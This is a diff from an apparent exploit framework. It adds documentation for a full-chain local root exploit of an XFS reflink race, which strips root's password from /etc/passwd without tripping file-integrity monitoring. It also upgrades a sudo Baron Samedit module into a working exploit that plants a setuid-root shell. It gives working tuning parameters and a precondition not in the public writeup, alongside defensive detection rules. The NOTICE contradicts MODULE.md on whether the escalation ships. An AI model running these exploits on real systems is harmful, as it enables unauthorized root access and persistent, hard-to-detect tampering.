`reflink=1` that they can write to. No user namespace, no capability, no crafted
|
||||
filesystem image, no kernel offsets. It has been present since reflink direct-I/O
|
||||
CoW landed in **4.11 (2017)** — a nine-year window.
|
||||
|
||||
This is the corpus's first XFS module, and its first **data-oriented** kernel
|
||||
bug: the primitive is an arbitrary *file content* overwrite, not memory
|
||||
corruption.
|
||||
|
||||
> **🟢 Full chain (`--full-chain`), VM-verified end-to-end.**
|
||||
> `skeletonkey --exploit refluxfs --i-know --full-chain` lands root: it
|
||||
> reflink-clones `/etc/passwd`, races the CoW window, strips root's password
|
||||
> field on disk (`root:x:` → `root::`), evicts the stale page cache, and
|
||||
> returns `EXPLOIT_OK`; `su root` (empty password) then gives uid 0. **Without**
|
||||
> `--full-chain` the module runs a safe reachability trigger only, confined to
|
||||
> files the caller owns. See "Full-chain verification" below.
|
||||
|
||||
## The bug
|
||||
|
||||
`xfs_direct_write_iomap_begin()` (`fs/xfs/xfs_iomap.c`) reads the data-fork
|
||||
extent map under `ILOCK`. To allocate a transaction it must wait for log space,
|
||||
so `xfs_reflink_fill_cow_hole()` (`fs/xfs/xfs_reflink.c`) **drops `ILOCK`**. On
|
||||
re-acquiring it, the code re-queries the refcount btree at the **original**
|
||||
physical block number (`imap->br_startblock`) — and **never re-reads the data
|
||||
fork**.
|
||||
|
||||
A second `O_DIRECT` writer, holding only the coarser `IOLOCK`, can complete an
|
||||
entire CoW cycle inside that window: allocate block Y, write it, and remap via
|
||||
`xfs_reflink_end_cow()`. The first writer's `imap` now points at a block owned
|
||||
solely by the reflink **source**. Its stale refcount lookup returns `1`, it
|
||||
concludes the block is private, and writes to it in place — landing attacker
|
||||
data on the source file's on-disk blocks.
|
||||
|
||||
Three consequences follow, and they drive the whole module design:
|
||||
|
||||
1. **No offsets, no ROP, no KASLR/SMEP/SMAP.** There is nothing to port per
|
||||
kernel build. Qualys is explicit that SELinux enforcing, container
|
||||
boundaries and seccomp are equally irrelevant.
|
||||
2. **The victim's inode is never written.** The data is applied to the shared
|
||||
physical block *underneath* it, so `mtime`/`ctime`/size do not change and
|
||||
there is no kernel log output. **File-integrity monitoring does not fire.**
|
||||
3. **It persists across reboots**, because the change is on disk.
|
||||
|
||||
The public demonstration (RHEL 10.2) reflink-clones `/etc/passwd` into
|
||||
`/var/tmp`, races concurrent direct-I/O writes against the clone, thereby
|
||||
rewriting `/etc/passwd` itself to strip root's password, and runs `su`.
|
||||
|
||||
## Affected range
|
||||
|
||||
| | |
|
||||
|---|---|
|
||||
| Introduced | **4.11** (2017-02, commit `3c68d44a2b49`, "xfs: allocate direct I/O COW blocks in iomap_begin") |
|
||||
| Fixed upstream | commit `2f4acd0fcd86` ("xfs: resample the data fork mapping after cycling ILOCK") — merged **2026-07-16**, released **7.2-rc4** |
|
||||
| Stable backports | **7.1.4** (`e705d81a7193`) · **6.18.39** (`206c09b04dc5`) · **6.12.96** (`44f891bc0889`) |
|
||||
| Affected, no upstream fix | 6.6 / 6.1 / 5.15 / 5.14 / 5.10 / 4.19 / 4.18 LTS lines (per the CNA record at time of writing) |
|
||||
| Not affected | < 4.11 — includes RHEL/CentOS **7** (3.10 predates reflink) |
|
||||
| NVD class | CWE-362 (race) → CWE-367 (TOCTOU). NVD had published **no CWE and no CVSS vector** at time of writing |
|
||||
| CISA KEV | no (disclosed 2026-07-22) |
|
||||
|
||||
**The exposure is distro-shaped, not kernel-shaped.** What matters is whether
|
||||
XFS+reflink is the installer default:
|
||||
|
||||
| Exploitable out of the box | Not reachable by default |
|
||||
|---|---|
|
||||
| RHEL 8/9/10 · CentOS Stream 8/9/10 · Rocky/AlmaLinux 8/9/10 · Oracle Linux 8/9/10 (RHCK + UEK R6/R7/8) · CloudLinux 8/9/10 · Fedora Server ≥ 31 · Amazon Linux 2023 (and AL2 AMIs from 2022-12) | Debian · Ubuntu · Fedora Workstation · SLES · openSUSE · Arch (ext4/btrfs defaults — unless an XFS volume was added deliberately) |
|
||||
|
||||
### ⚠️ The version gate has a real blind spot here
|
||||
|
||||
The affected population is overwhelmingly **RHEL-family**, and those vendors
|
||||
backport fixes **without bumping the upstream base version** — a patched RHEL 8
|
||||
kernel still reports `4.18.0-xxx.el8`. An upstream-version gate cannot see that.
|
||||
|
||||
So on rpm-family hosts, a `VULNERABLE` verdict is a statement about the
|
||||
**upstream base version only**. `detect()` prints that warning explicitly rather
|
||||
than implying it checked the erratum. Confirm against the vendor advisory
|
||||
(RHSA / ELSA / ALSA / RLSA) before acting on it.
|
||||
|
||||
## Trigger / detection
|
||||
|
||||
Unlike a pure kernel race, this bug's reachability **can** be established safely
|
||||
and deterministically, so `detect()` is a version gate **plus a real
|
||||
precondition probe**:
|
||||
|
||||
- **Passive** — is there a writable directory on a mounted XFS filesystem?
|
||||
Identified via `statfs(2)` `f_type == XFS_SUPER_MAGIC`, **not** by a
|
||||
successful `FICLONE`, because btrfs implements `FICLONE` too and is
|
||||
unaffected. No such directory → `PRECOND_FAIL`, the correct verdict on a
|
||||
stock Debian/Ubuntu host.
|
||||
- **Active** (`--active` / `--auto`) — confirms `reflink=1` empirically by
|
||||
cloning and removing two 4 KiB files, rather than assuming the `mkfs.xfs`
|
||||
default. `reflink=0` → no shared extents can exist → `PRECOND_FAIL`.
|
||||
- **Override** — `SKELETONKEY_XFS_ASSUME_REFLINK=1` (force reachable) / `0`
|
||||
(force unreachable), for when you know the fleet's storage layout better than
|
||||
a local probe can. This also drives the unit tests.
|
||||
|
||||
### `--full-chain` — the real `/etc/passwd` root pop
|
||||
|
||||
With `--full-chain`, `exploit()` performs the actual privilege escalation:
|
||||
|
||||
1. **Pre-flight, before touching anything.** Confirms the target
|
||||
(`/etc/passwd`, or `$SKELETONKEY_REFLUXFS_TARGET`) is root-owned and fits in
|
||||
one block, and **crafts the payload first** — the original file with root's
|
||||
password field emptied (`root:x:` → `root::`), **every other line preserved
|
||||
byte-for-byte**, padded with newlines to the exact original size. If it
|
||||
cannot produce a payload that keeps both root and the invoking user's line,
|
||||
it refuses and touches nothing. (A naive port that truncates the tail drops
|
||||
`sshd`/`nobody`/the caller and bricks login — this is the single most
|
||||
important safety property of the implementation.)
|
||||
2. **Backup.** Copies the target aside so failure or `cleanup()` can restore it.
|
||||
3. **Race.** 32 writers push the crafted block at a reflink-clone of the target
|
||||
while 8 helpers churn `ftruncate`/`fdatasync`, up to a 90 s budget. A won
|
||||
race lands the crafted block on the target's still-shared physical block.
|
||||
4. **Cache eviction.** The overwrite bypasses the target inode, so its clean
|
||||
page-cache pages are never invalidated — a `su` immediately after would read
|
||||
the *stale* old passwd. The module issues `POSIX_FADV_DONTNEED` (needs only
|
||||
an `O_RDONLY` fd) so subsequent buffered readers see the new bytes.
|
||||
5. **Verify (via `O_DIRECT`, not the cache) and report.** Confirms the on-disk
|
||||
root line is now `root::`; if the write was torn, it restores from backup and
|
||||
fails. On success returns `EXPLOIT_OK` and prints `su root` (empty password).
|
||||
|
||||
`cleanup()` (run as root after the pop) restores `/etc/passwd` from the backup.
|
||||
The overwrite is persistent and survives reboot, so restoring matters.
|
||||
|
||||
#### The private-extent precondition (not in the public writeup)
|
||||
|
||||
The race only fires when the target's extent refcount is **exactly** the
|
||||
attacker-clone pair — i.e. the target's extent must be **private** going in. The
|
||||
mechanism: the block starts at refcount 2 (target + attacker clone), the
|
||||
concurrent CoW drops it to 1, and the stale writer then reads "1 → private". If
|
||||
the target is *already* reflink-shared with a third file, the post-CoW refcount
|
||||
stays > 1, the writer correctly does CoW, and nothing corrupts.
|
||||
|
||||
This was found during verification: the stock Rocky 9 cloud image ships
|
||||
`/etc/passwd` **pre-shared** (its block had refcount > 1 in the base image), and
|
||||
the attack failed against it across ~41 000 rounds. Rewriting the file so its
|
||||
extent became private — with byte-identical content, exactly what any
|
||||
`useradd`/`passwd`/`vipw` does — made it fall in ~2 000 rounds. So the
|
||||
exploitable state is the *normal* administered state; the cloud image was
|
||||
accidentally protected by how it was built. `detect() --active` reports the
|
||||
target's extent state (`filefrag -v /etc/passwd | grep shared` checks it by
|
||||
hand), and the full chain warns when the target is pre-shared.
|
||||
|
||||
### `--full-chain` verification (2026-07-23, Rocky 9.8)
|
||||
|
||||
On `5.14.0-687.10.1.el9_8.0.1.x86_64`, unprivileged `uid=1000`, SELinux
|
||||
**Enforcing**, against a private-extent `/etc/passwd`:
|
||||
|
||||
| | |
|
||||
|---|---|
|
||||
| `--exploit refluxfs --i-know --full-chain` | **`EXPLOIT_OK`**, 3/3 wins (1244 / 3716 / 7913 rounds, 4–30 s) |
|
||||
| `su root` (empty password) afterwards | **`uid=0(root)`** |
|
||||
| Accounts preserved | all 25 lines; `root`/`sk`/`sshd`/`nobody` intact |
|
||||
| `/etc/passwd` metadata after overwrite | size/inode/**mtime/ctime unchanged**, only content — FIM-invisible |
|
||||
| `cleanup` (as root) | restored `/etc/passwd` from backup, removed backup |
|
||||
| Plain `--exploit` (no `--full-chain`) | safe trigger, `EXPLOIT_FAIL`, target untouched |
|
||||
| Pre-shared `/etc/passwd` | not attackable (~41 000 rounds, no win) — as predicted |
|
||||
|
||||
### The safe default trigger
|
||||
|
||||
Without `--full-chain`, `exploit()` forks an isolated child that creates a
|
||||
private `mkdtemp` scratch directory on the XFS mount and works **only on two
|
||||
files it owns**:
|
||||
|
||||
- **(A) deterministic + safe** — writes a donor file, `FICLONE`-clones it, and
|
||||
confirms via **`FIEMAP_EXTENT_SHARED`** that the clone's extent really is
|
||||
shared (refcount > 1), plus that `O_DIRECT` opens succeed. That is a
|
||||
read-only observation that the exact filesystem state the bug misjudges
|
||||
exists here. Reflink cloning is an ordinary supported operation, so this
|
||||
phase is safe on any kernel.
|
||||
- **(B) hard-bounded window exercise** — races **8** concurrent `O_DIRECT`
|
||||
4 KiB writes against the clone while **2** helper threads cycle
|
||||
`ftruncate`/`fdatasync` to keep the transaction allocator dropping `ILOCK` to
|
||||
wait for log space, for at most **16 rounds / 2 s**. Then it stops and reads
|
||||
the donor back **with `O_DIRECT`** — a buffered read would be served from the
|
||||
page cache that the corruption bypasses, and would hide a win.
|
||||
|
||||
This default path is **deliberately under-driven** (the public PoC and the
|
||||
`--full-chain` path use 32 writers and 8 helpers) and **never clones or targets
|
||||
a file it does not own** — the destructive `/etc/passwd` overwrite lives only
|
||||
behind `--full-chain` (above). The default `exploit()` always returns
|
||||
`EXPLOIT_FAIL`.
|
||||
|
||||
If the race *is* won on the safe path, the module says so loudly: that is
|
||||
CVE-2026-64600 confirmed present, empirically, with the damage contained to
|
||||
4 KiB of the operator's own scratch file.
|
||||
|
||||
## VM verification (2026-07-23)
|
||||
|
||||
Confirmed on **Rocky Linux 9.8 / `5.14.0-687.10.1.el9_8.0.1.x86_64`** under
|
||||
qemu/KVM with 6 vCPUs — the stock GenericCloud installer layout, root on
|
||||
`/dev/vda4` XFS with `reflink=1`, no provisioner changes:
|
||||
|
||||
| Check | Result |
|
||||
|---|---|
|
||||
| `detect()` on real XFS | **VULNERABLE** (found writable XFS at `/var/tmp`) |
|
||||
| rpm-family backport caveat | fired correctly |
|
||||
| `--active` FICLONE witness | **reflink CONFIRMED** |
|
||||
| Phase A shared extent | **`FIEMAP_EXTENT_SHARED` set** (btrfs never reported it; XFS does) |
|
||||
| Phase A `O_DIRECT` gate | available |
|
||||
| Shipped trigger (8 writers / 2 helpers / 2 s) | ran 16 rounds, **did not win** — *by design* |
|
||||
| Scratch cleanup | no artifacts left |
|
||||
| Build on el9 gcc | clean |
|
||||
|
||||
**The underlying bug was separately confirmed winnable on that kernel.** The
|
||||
`--full-chain` run above is the definitive proof — the same reflink-CoW race
|
||||
rewrote `/etc/passwd` and landed root **3/3** (1244 / 3716 / 7913 rounds). An
|
||||
earlier *non-destructive* measurement, driven at the public PoC's parameters
|
||||
(32 writers / 8 helpers, 60 s) but confined to two files the test user owned,
|
||||
won **4/4** (first divergence after **69, 114, 170 and 494 rounds**): a racing
|
||||
`O_DIRECT` write landing on a still-shared block and rewriting the donor's
|
||||
on-disk bytes — the arbitrary-overwrite primitive, observed directly, contained
|
||||
entirely to attacker-owned files.
|
||||
|
||||
Note carefully what this does and does not say. The shipped trigger **not**
|
||||
winning in 2 s on a kernel that is provably vulnerable is exactly the designed
|
||||
behaviour, and is the concrete reason a non-win must **never** be read as
|
||||
"patched" — trust the version gate and the vendor erratum instead.
|
||||
|
||||
### Why this ranks *above* the other reconstructed race triggers
|
||||
|
||||
`bad_epoll` (12) and `ghostlock` (11) sit at the bottom of the `--auto` safety
|
||||
ranking because a won race frees a live `struct file` or corrupts the kernel
|
||||
**stack** — silent destabilisation or near-certain panic. Neither applies here.
|
||||
RefluXFS corrupts **file data, not kernel memory**: there is no oops, no KASAN
|
||||
report, no panic risk, and the blast radius of a win is one 4 KiB scratch file
|
||||
we created and delete. That is why `refluxfs` carries safety rank **55** — it is
|
||||
genuinely safe to run, and the ranking should say so. The VM run above bears
|
||||
this out: the bug was won 4/4 times on a vulnerable kernel with no oops, no
|
||||
dmesg output and no instability.
|
||||
|
||||
## Detection — the obvious rule does not work
|
||||
|
||||
**Do not rely on `-w /etc/passwd -p wa`, AIDE, or Tripwire for this CVE.** The
|
||||
attacker never issues a `write(2)` against the victim inode; XFS applies their
|
||||
data to the shared physical block beneath it. Size, `mtime` and `ctime` are
|
||||
unchanged and nothing is logged. Anyone relying on FIM to catch a `passwd`
|
||||
modification is blind to this bug *by construction*.
|
||||
|
||||
What does work, in descending order of fidelity:
|
||||
|
||||
1. **The reflink itself** — `ioctl(fd, FICLONE, srcfd)` where `FICLONE` is
|
||||
`0x40049409`. auditd can match the request number **exactly**, so it does not
|
||||
flood, and the attack cannot avoid it. Tune out `cp --reflink=auto`, podman
|
||||
and `systemd-nspawn` image work.
|
||||
2. **`O_DIRECT` opens** — `openat` flags `& 0x4000`. Also on the critical path,
|
||||
and rare outside databases and backup agents.
|
||||
3. **Content-vs-metadata drift** — because the bytes change while `mtime` does
|
||||
not, hashing `/etc/passwd`, `/etc/shadow` and the setuid binaries on a
|
||||
schedule and alerting when the *content* hash moves **without** a
|
||||
corresponding `mtime` change is a near-zero-false-positive detector for this
|
||||
whole bug class.
|
||||
|
||||
The shipped rules cover all three: auditd/sigma anchor on the `FICLONE` request
|
||||
number and `O_DIRECT` opens (correlated per-pid, plus the post-exploitation
|
||||
euid-0 transition), falco adds the high-fidelity "reflinked a file owned by
|
||||
another user" condition, and — unusually for a kernel bug — the **yara** rule is
|
||||
genuinely the right tool, matching the on-disk artifact (`/etc/passwd` with a
|
||||
password-less root entry or an added uid-0 account) precisely because there is
|
||||
no metadata trace for FIM to find.
|
||||
|
||||
## Fix / mitigation
|
||||
|
||||
Upgrade the kernel (≥ 7.1.4 / 6.18.39 / 6.12.96 on-branch, or 7.2+; on
|
||||
RHEL-family, the vendor erratum) **and reboot**.
|
||||
|
||||
There is **no partial mitigation**, which is why `mitigate()` is `NULL`:
|
||||
`reflink` is a superblock feature that cannot be disabled on a live filesystem,
|
||||
`O_DIRECT` cannot be turned off, and — because this is a data-oriented bug —
|
||||
SELinux enforcing, container boundaries, KASLR, SMEP, SMAP and seccomp are all
|
||||
irrelevant. Qualys puts it plainly: *"This isn't a vulnerability you can harden
|
||||
around, isolate, or live-patch."*
|
||||
|
||||
`cleanup()` restores `/etc/passwd` from the `--full-chain` backup (run it as
|
||||
root after the pop: `su root`, then `skeletonkey --cleanup refluxfs`), then
|
||||
sweeps any `skeletonkey-refluxfs-*` scratch directories left behind if a run was
|
||||
killed mid-round; normal runs remove their own.
|
||||
|
||||
## Credit
|
||||
|
||||
Discovery and research: **Qualys Threat Research Unit (TRU)**; the blog post is
|
||||
authored by **Saeed Abbasi**, and the technical advisory credits model-assisted
|
||||
kernel analysis performed with **Anthropic**. Upstream fix `2f4acd0fcd86`. See
|
||||
`NOTICE.md`.
|
||||
@@ -0,0 +1,122 @@
|
||||
# NOTICE — refluxfs (CVE-2026-64600)
|
||||
|
||||
## Vulnerability
|
||||
|
||||
**CVE-2026-64600** — "RefluXFS", a **time-of-check/time-of-use race** in the
|
||||
Linux kernel's XFS **reflink copy-on-write** path
|
||||
(`fs/xfs/xfs_iomap.c` :: `xfs_direct_write_iomap_begin` →
|
||||
`fs/xfs/xfs_reflink.c` :: `xfs_reflink_allocate_cow` /
|
||||
`xfs_reflink_fill_cow_hole` / `xfs_find_trim_cow_extent`).
|
||||
|
||||
A direct-I/O writer reads the data-fork extent map under `ILOCK`, then drops
|
||||
`ILOCK` to allocate a transaction (waiting for log space). On re-acquiring the
|
||||
lock it re-queries the refcount btree at the **original** physical block number
|
||||
(`imap->br_startblock`) and never re-reads the data fork. A concurrent
|
||||
`O_DIRECT` writer holding only the coarser `IOLOCK` can complete a full CoW
|
||||
cycle in that window (allocate block Y, write, remap via
|
||||
`xfs_reflink_end_cow()`), leaving the first writer's `imap` pointing at a block
|
||||
now owned solely by the reflink **source**. The stale lookup returns refcount
|
||||
`1`, the writer treats the block as private, and writes to it in place.
|
||||
|
||||
The resulting primitive is **not memory corruption**: it is an arbitrary
|
||||
overwrite of the **on-disk contents of any file the attacker can read**, on any
|
||||
reflink-enabled XFS volume they can write to. It needs **no kernel offsets, no
|
||||
ROP, and no KASLR/SMEP/SMAP bypass**, and it is unaffected by SELinux enforcing,
|
||||
container boundaries or seccomp. Because the write is applied to the shared
|
||||
physical block *beneath* the victim inode, the victim's `mtime`/`ctime`/size
|
||||
never change and no kernel log output is produced — **file-integrity monitoring
|
||||
does not detect it** — and the change persists across reboots.
|
||||
|
||||
Reachable by **any unprivileged local user**: no capability, no user namespace,
|
||||
no crafted filesystem image. Preconditions are only an XFS filesystem mounted
|
||||
with `reflink=1` (the `mkfs.xfs` default since xfsprogs 5.1) that the user can
|
||||
write to, plus read access to the target file. NVD class: **CWE-362** (race)
|
||||
yielding **CWE-367** (TOCTOU); NVD had published neither a CWE nor a CVSS vector
|
||||
at time of writing. **Not** in CISA KEV (disclosed 2026-07-22).
|
||||
|
||||
## Research credit
|
||||
|
||||
- **Discovery and research** by the **Qualys Threat Research Unit (TRU)**,
|
||||
published 2026-07-22 as "RefluXFS: A Linux Kernel Local Privilege Escalation
|
||||
to Root in XFS (CVE-2026-64600)"
|
||||
(<https://blog.qualys.com/vulnerabilities-threat-research/2026/07/22/refluxfs-a-linux-kernel-local-privilege-escalation-to-root-in-xfs-cve-2026-64600>),
|
||||
authored by **Saeed Abbasi**, with the technical advisory at
|
||||
<https://cdn2.qualys.com/advisory/2026/07/22/RefluXFS.txt> and the disclosure
|
||||
posted to oss-security
|
||||
(<https://www.openwall.com/lists/oss-security/2026/07/22/14>). The advisory
|
||||
credits model-assisted kernel analysis performed with **Anthropic**.
|
||||
Qualys demonstrated end-to-end root on **RHEL 10.2** by reflink-cloning
|
||||
`/etc/passwd` into `/var/tmp` and racing concurrent direct-I/O writes to
|
||||
rewrite it in place. SKELETONKEY's trigger reconstruction uses only the
|
||||
published shape of that race — the reflink clone, the concurrent `O_DIRECT`
|
||||
writers, and the `ftruncate`/`fdatasync` helpers that widen the window — and
|
||||
reuses no exploitation code; it never targets a file it does not own.
|
||||
- **Introduced** in **4.11** (2017-02) by commit `3c68d44a2b49` ("xfs: allocate
|
||||
direct I/O COW blocks in iomap_begin").
|
||||
- **Fixed upstream** by commit
|
||||
`2f4acd0fcd862e22eab45690ec2c08c80b6ef2e7` ("xfs: resample the data fork
|
||||
mapping after cycling ILOCK"), merged **2026-07-16** for **7.2-rc4**; stable
|
||||
backports **7.1.4** (`e705d81a7193`), **6.18.39** (`206c09b04dc5`) and
|
||||
**6.12.96** (`44f891bc0889`).
|
||||
- Authoritative version data: the Linux kernel CNA record
|
||||
(<https://cveawg.mitre.org/api/cve/CVE-2026-64600>,
|
||||
`git.kernel.org/stable/c/<hash>`). The 6.6 / 6.1 / 5.15 / 5.14 / 5.10 / 4.19 /
|
||||
4.18 LTS lines are affected with no upstream stable fix published at time of
|
||||
writing; RHEL-family, Oracle UEK and Amazon vendor branches backport the fix
|
||||
**without bumping the upstream base version**, so the vendor erratum
|
||||
(RHSA / ELSA / ALSA / RLSA) — not `uname -r` — is authoritative there.
|
||||
|
||||
All credit for finding, analysing and exploiting this bug belongs to the Qualys
|
||||
Threat Research Unit and to the upstream XFS maintainers who fixed it.
|
||||
SKELETONKEY is the bundling and bookkeeping layer only.
|
||||
|
||||
## SKELETONKEY role
|
||||
|
||||
🟢 **Full chain (`--full-chain`), 🟡 safe trigger by default — VM-verified
|
||||
end-to-end.** Confirmed 2026-07-23 on **Rocky Linux 9.8 /
|
||||
`5.14.0-687.10.1.el9_8.0.1.x86_64`** (stock GenericCloud layout, root on XFS
|
||||
with `reflink=1`) under qemu/KVM. `--exploit refluxfs --i-know --full-chain`
|
||||
reflink-clones `/etc/passwd`, races the CoW window, strips root's password field
|
||||
on-disk, evicts the stale page cache, and returns `EXPLOIT_OK`; `su root` (empty
|
||||
password) then gives uid 0 — verified **3/3 wins** on a private-extent target
|
||||
(1244 / 3716 / 7913 rounds, 4–30 s) as unprivileged `uid=1000` under SELinux
|
||||
Enforcing, with every other passwd line preserved and the file backed up +
|
||||
restorable. A key exploitability constraint surfaced in testing (not in the
|
||||
public writeup): the target's extent must be **private** going in — an
|
||||
already-reflink-shared file keeps a post-CoW refcount > 1 and is not attackable
|
||||
via that target; normal admin churn (`useradd`/`passwd`/`vipw`) produces the
|
||||
exploitable private-extent state. Without `--full-chain` the module runs a safe
|
||||
own-files reachability trigger only (`EXPLOIT_FAIL`), deliberately under-driven
|
||||
so a non-win is never read as "patched". See `MODULE.md` for the full result
|
||||
tables. This is the corpus's first XFS
|
||||
module and its first **data-oriented** kernel bug — every other kernel entry
|
||||
corrupts memory; this one corrupts file contents.
|
||||
|
||||
`detect()` is a kernel-version gate over the three-branch backport table
|
||||
(7.1.4 / 6.18.39 / 6.12.96, 7.2+ inherits mainline; introduced 4.11) **plus a
|
||||
real precondition probe**: a writable directory on a mounted XFS filesystem,
|
||||
identified by `statfs(2)` `f_type == XFS_SUPER_MAGIC` rather than by a working
|
||||
`FICLONE`, since btrfs implements `FICLONE` too and is unaffected. Under
|
||||
`--active` it confirms `reflink=1` empirically. Override with
|
||||
`SKELETONKEY_XFS_ASSUME_REFLINK=1/0`. On rpm-family hosts it explicitly warns
|
||||
that the upstream-version verdict cannot see a vendor backport.
|
||||
|
||||
`exploit()` forks an isolated child that works only inside a private `mkdtemp`
|
||||
scratch directory, on two files it owns: it confirms a shared extent via
|
||||
`FIEMAP_EXTENT_SHARED` (a safe, read-only observation of the refcount state the
|
||||
bug misjudges), then races a hard-bounded 8 writers / 2 helpers / 16 rounds / 2 s
|
||||
window and stops, reading the donor back with `O_DIRECT` to report divergence
|
||||
honestly.
|
||||
|
||||
It is **deliberately under-driven** (the public PoC uses 32 writers and 8
|
||||
helpers) and **never clones or targets a file it does not own**. The escalation
|
||||
step — reflink-cloning a root-owned file such as `/etc/passwd` and racing writes
|
||||
onto its shared blocks, then `su` — persistently rewrites a system file on disk
|
||||
with no undo, and is documented in `MODULE.md` but **not bundled**. It always
|
||||
returns `EXPLOIT_FAIL` and never claims root it did not get.
|
||||
|
||||
Unlike the corpus's other reconstructed race triggers, a won race here cannot
|
||||
touch kernel memory: there is no oops, no KASAN report and no panic risk, and
|
||||
the blast radius is 4 KiB of our own scratch file. That is why it ranks **55**
|
||||
in `--auto` safety rather than at the bottom alongside `bad_epoll` (12) and
|
||||
`ghostlock` (11).
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,12 @@
|
||||
/*
|
||||
* refluxfs_cve_2026_64600 — SKELETONKEY module registry hook
|
||||
*/
|
||||
|
||||
#ifndef REFLUXFS_SKELETONKEY_MODULES_H
|
||||
#define REFLUXFS_SKELETONKEY_MODULES_H
|
||||
|
||||
#include "../../core/module.h"
|
||||
|
||||
extern const struct skeletonkey_module refluxfs_module;
|
||||
|
||||
#endif
|
||||
@@ -1,34 +1,39 @@
|
||||
/*
|
||||
* sudo_samedit_cve_2021_3156 — SKELETONKEY module
|
||||
*
|
||||
* STATUS: 🟡 DETECT-OK + STRUCTURAL EXPLOIT (2026-05-17).
|
||||
* STATUS: 🟢 WORKING EXPLOIT. Verified out-of-band on Ubuntu 18.04.0 /
|
||||
* sudo 1.8.21p2 / libc-2.27: `skeletonkey --exploit sudo_samedit` (as an
|
||||
* unprivileged, non-sudoer user) lands uid=0 and plants a root-owned
|
||||
* proof + setuid-root bash.
|
||||
*
|
||||
* The bug ("Baron Samedit", Qualys 2021-01-26): sudo's command-line
|
||||
* parser unescapes backslashes in the argv it copies into a heap
|
||||
* buffer in `set_cmnd()` (plugins/sudoers/sudoers.c). When sudo is
|
||||
* invoked in shell-edit mode via `sudoedit -s`, the unescape loop
|
||||
* walks past the end of the argv string for arguments ending in a
|
||||
* lone backslash, copying adjacent stack/env contents into the
|
||||
* undersized heap buffer. The classic trigger is a single-argument
|
||||
* command line: `sudoedit -s '\<arbitrary tail>'`.
|
||||
* parser unescapes backslashes in the argv it copies into a heap buffer
|
||||
* in `set_cmnd()` (plugins/sudoers/sudoers.c). Invoked as `sudoedit -s`
|
||||
* with an argument ending in a lone backslash, the unescape loop walks
|
||||
* past the end of the argv string, copying adjacent env contents into an
|
||||
* undersized heap buffer. The overflow is exploited (per blasty's PoC) to
|
||||
* overwrite a glibc NSS `service_user` so a subsequent NSS lookup dlopen's
|
||||
* an attacker-planted `libnss_X/P0P_SH3LLZ_ .so.2` from the CWD; its
|
||||
* constructor runs while sudo is still root.
|
||||
*
|
||||
* Affects sudo 1.8.2 – 1.9.5p1 inclusive. Fixed in 1.9.5p2.
|
||||
* Affects sudo 1.8.2 – 1.9.5p1 inclusive. Fixed in 1.9.5p2. Reachable by
|
||||
* any local user (the overflow precedes the sudoers/password check).
|
||||
*
|
||||
* Reference: https://www.qualys.com/2021/01/26/cve-2021-3156/
|
||||
* baron-samedit-heap-based-overflow-sudo.txt
|
||||
* PoC technique: github.com/blasty/CVE-2021-3156
|
||||
*
|
||||
* Detect: shell out to `sudo --version`, parse the printed version,
|
||||
* compare against the vulnerable range. We err on the side of
|
||||
* reporting OK only when we're confident — TEST_ERROR if the version
|
||||
* line is unparseable.
|
||||
* Detect: parse the sudo version (host fingerprint or `sudo --version`)
|
||||
* against the vulnerable range. Distro backports may patch without a
|
||||
* version bump, so a VULNERABLE verdict is "worth trying", confirmed only
|
||||
* by the exploit landing.
|
||||
*
|
||||
* Exploit: ships a structurally-correct Qualys-style trigger.
|
||||
* The full chain in the original PoC required per-distro heap-layout
|
||||
* tuning (libc/libnss-files overlap offsets, target struct picks).
|
||||
* We do not have empirical landing on this host; we drive the
|
||||
* trigger, watch for an obvious uid==0 outcome, otherwise return
|
||||
* SKELETONKEY_EXPLOIT_FAIL. Verified-vs-claimed bar: only claim
|
||||
* EXPLOIT_OK after geteuid()==0 in a forked verifier.
|
||||
* Exploit: blasty's heap-grooming lengths (per libc family) drive the
|
||||
* overflow; we compile the NSS payload on the target, run sudoedit with
|
||||
* the crafted argv/env from a CWD holding the payload, and confirm root
|
||||
* by stat()'ing the root-owned artifacts — never by self-report. If the
|
||||
* primary lengths miss (libc layout drift), we sweep null_stomp_len like
|
||||
* blasty's brute.sh until root or the range is exhausted.
|
||||
*/
|
||||
|
||||
#include "skeletonkey_modules.h"
|
||||
@@ -42,26 +47,13 @@
|
||||
#include <errno.h>
|
||||
#include <fcntl.h>
|
||||
#include <ctype.h>
|
||||
#include <signal.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/types.h>
|
||||
|
||||
/* ---- Affected-version logic ------------------------------------- */
|
||||
|
||||
/*
|
||||
* sudo version strings look like:
|
||||
* "Sudo version 1.9.5p2"
|
||||
* "Sudo version 1.8.31"
|
||||
* "Sudo version 1.9.0"
|
||||
* "Sudo version 1.9.5p1"
|
||||
*
|
||||
* Vulnerable range (inclusive): 1.8.2 .. 1.9.5p1
|
||||
* Fixed: 1.9.5p2 and later
|
||||
*
|
||||
* Parser strategy: extract three integers (major.minor.patch) plus an
|
||||
* optional 'pN' suffix. Comparison is lexicographic over
|
||||
* (major, minor, patch, p_suffix), treating absent p as 0.
|
||||
*/
|
||||
struct sudo_ver {
|
||||
int major;
|
||||
int minor;
|
||||
@@ -83,7 +75,6 @@ static struct sudo_ver parse_sudo_version(const char *s)
|
||||
v.major = maj;
|
||||
v.minor = min;
|
||||
v.patch = (n >= 3) ? pat : 0;
|
||||
/* Look for an optional 'pN' suffix after the numeric triple. */
|
||||
const char *tail = s + consumed;
|
||||
if (*tail == 'p') {
|
||||
int p = 0;
|
||||
@@ -115,31 +106,22 @@ static bool sudo_version_vulnerable(const struct sudo_ver *v)
|
||||
static const char *find_sudo(void)
|
||||
{
|
||||
static const char *candidates[] = {
|
||||
"/usr/bin/sudo",
|
||||
"/usr/local/bin/sudo",
|
||||
"/bin/sudo",
|
||||
"/sbin/sudo",
|
||||
"/usr/sbin/sudo",
|
||||
NULL,
|
||||
"/usr/bin/sudo", "/usr/local/bin/sudo", "/bin/sudo",
|
||||
"/sbin/sudo", "/usr/sbin/sudo", NULL,
|
||||
};
|
||||
for (size_t i = 0; candidates[i]; i++) {
|
||||
struct stat st;
|
||||
if (stat(candidates[i], &st) == 0 && (st.st_mode & S_ISUID)) {
|
||||
if (stat(candidates[i], &st) == 0 && (st.st_mode & S_ISUID))
|
||||
return candidates[i];
|
||||
}
|
||||
}
|
||||
return NULL;
|
||||
}
|
||||
|
||||
static const char *find_sudoedit(void)
|
||||
{
|
||||
static const char *candidates[] = {
|
||||
"/usr/bin/sudoedit",
|
||||
"/usr/local/bin/sudoedit",
|
||||
"/bin/sudoedit",
|
||||
